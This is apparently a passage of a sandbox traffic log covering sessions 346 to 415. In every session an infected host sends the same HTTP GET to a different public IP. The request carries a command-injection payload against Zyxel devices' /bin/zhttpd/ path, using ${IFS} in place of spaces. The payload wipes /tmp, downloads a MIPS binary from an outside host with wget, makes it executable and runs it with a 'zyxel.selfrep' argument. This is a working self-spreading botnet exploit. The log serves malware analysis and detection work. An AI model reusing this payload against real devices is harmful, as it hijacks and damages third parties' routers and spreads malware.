                              346192.168.2.135718281.30.99.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485775948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              347192.168.2.1359722208.72.203.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485812902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              348192.168.2.134755286.189.12.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485876083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              349192.168.2.134164071.237.39.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485908031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              350192.168.2.1356968105.121.195.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485948086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              351192.168.2.1360418185.16.253.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.485975981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              352192.168.2.1337278193.7.32.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486011028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              353192.168.2.1335258193.203.40.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486069918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              354192.168.2.1352186163.167.27.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486119032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              355192.168.2.1338894223.43.155.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486151934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              356192.168.2.1334476150.242.157.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486183882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              357192.168.2.1351848208.165.229.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486232996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              358192.168.2.1338630173.223.189.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486265898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              359192.168.2.134946674.54.128.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486311913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              360192.168.2.1358980184.230.225.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486350060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              361192.168.2.134784852.62.170.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486386061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              362192.168.2.13583128.65.65.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486418962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              363192.168.2.1360086171.104.24.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486450911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              364192.168.2.1357230170.220.183.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486488104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              365192.168.2.135648645.81.44.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486500025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              366192.168.2.1339608185.131.234.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486542940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              367192.168.2.1335668174.24.174.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486582041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              368192.168.2.1333902211.103.174.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486619949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              369192.168.2.1347618197.6.123.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486653090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              370192.168.2.1354910134.87.106.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486685991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              371192.168.2.1349024136.58.18.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486721039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              372192.168.2.135506054.35.133.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486749887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              373192.168.2.1345216124.131.75.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486799002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              374192.168.2.135621665.193.4.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486844063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              375192.168.2.1360084120.52.124.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486874104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              376192.168.2.134428647.231.115.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486913919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              377192.168.2.1359208182.12.188.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486941099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              378192.168.2.1344056102.15.175.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.486959934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              379192.168.2.1341058117.123.159.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487004042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              380192.168.2.133634699.140.218.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487055063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              381192.168.2.135618214.156.169.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487075090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              382192.168.2.1344904164.19.229.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487102032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              383192.168.2.135822637.121.40.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487159967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              384192.168.2.1340506178.59.178.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487193108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              385192.168.2.1335804185.64.232.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487225056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              386192.168.2.1359044207.97.193.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487256050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              387192.168.2.1352848109.37.161.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487293005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              388192.168.2.1359268102.185.116.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487333059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              389192.168.2.133292286.4.179.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487359047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              390192.168.2.1358832117.81.77.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487394094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              391192.168.2.133772696.160.172.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487433910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              392192.168.2.134456282.140.173.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487464905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              393192.168.2.1340058113.185.197.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487489939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              394192.168.2.135884485.124.223.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487536907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              395192.168.2.1348846182.131.74.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487564087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              396192.168.2.1342470200.217.252.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487610102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              397192.168.2.1333082163.5.174.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487654924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              398192.168.2.1338072103.45.250.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487677097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              399192.168.2.1333396172.53.28.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487739086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              400192.168.2.1333180184.177.2.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487755060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              401192.168.2.1336044186.1.255.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487809896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              402192.168.2.135477861.87.156.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487869024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              403192.168.2.1352454186.86.163.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487891912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              404192.168.2.1341130184.71.194.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487919092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              405192.168.2.133473666.32.128.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.487971067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              406192.168.2.1334802199.104.211.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488015890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              407192.168.2.135315248.42.217.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488065958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              408192.168.2.134117846.167.84.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488115072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              409192.168.2.1353054184.7.91.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488146067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              410192.168.2.133941494.159.238.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488183022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              411192.168.2.134603894.211.228.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488234043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              412192.168.2.135353662.4.16.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488295078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              413192.168.2.133584257.119.135.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488298893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              414192.168.2.134593450.40.114.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488353968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              415192.168.2.1360128193.154.238.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.488415003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


